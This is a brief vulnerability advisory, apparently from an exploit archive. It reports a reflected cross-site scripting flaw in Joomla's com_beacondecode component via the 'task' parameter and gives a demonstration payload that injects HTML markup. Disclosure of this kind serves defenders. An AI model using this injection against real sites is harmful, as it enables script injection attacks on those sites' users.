The Joomla BeaconDecode component suffers from a cross site scripting vulnerability.
246d3ac6ff9bedeeee5714e263d3feeb085e0567311d93dced373fa7355869bc
# Cross Site Scripting on Joomla "com_beacondecode"
# Risk: Low
# CWE number: CWE-79
# Date: 14/04/2014
# Project: www.joomla.org
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php?option=com_beacondecode&task=
# Exploit:
- Target: http://site.com
- Vuln. File: /index.php?option=com_beacondecode&task=
- Exploit: "><marquee>Vulnerable</marquee>